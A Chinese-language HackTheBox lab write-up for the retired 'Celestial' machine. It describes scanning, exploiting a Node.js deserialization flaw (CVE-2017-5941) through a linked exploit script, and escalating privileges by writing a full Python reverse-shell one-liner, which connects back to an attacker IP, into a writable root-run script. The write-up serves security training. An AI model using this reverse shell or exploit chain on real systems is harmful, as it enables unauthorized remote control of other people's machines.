HTB-靶機-Celestial
阿新 • • 發佈:2020-12-07
本篇文章僅用於技術交流學習和研究的目的,嚴禁使用文章中的技術用於非法目的和破壞,否則造成一切後果與發表本文章的作者無關
靶機是作者購買VIP使用退役靶機操作,顯示IP地址為10.10.10.85
本次使用https://github.com/Tib3rius/AutoRecon 進行自動化全方位掃描
執行命令autorecon 10.10.10.85 -o ./Celestial-autorecon
就開了個3000埠,訪問看看
再重新整理一下看到上面資訊,看下burpsuite的請求資訊
發現base64編碼資訊,解碼一下得到上述明文,隨便改個數字3在burpsuite上配置編碼為base64得到如下報錯資訊
看顯示是跟nodejs有關,搜尋了下對應名稱是否含有漏洞,確認存在反序列化遠端程式碼執行漏洞,參考連結:https://help.aliyun.com/knowledge_detail/50422.html 再搜尋下exploit ,具體exploit地址:https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/
exploit程式碼:
https://github.com/hoainam1989/training-application-security/blob/master/shell/node_shell.py
具體操作如下:
成功反彈shell,獲取了user.txt資訊,嘗試提權,執行了sudo -l需要無果,看到當前目錄含有一個指令碼
顯示指令碼是在執行,下載pspy到目標靶機執行得到如下結果
確認檔案script.py可以寫入檔案,使用vi編輯器寫入反彈程式碼
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.5",8844));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
等待反彈shell,差不多等了5-10分鐘成功反彈shell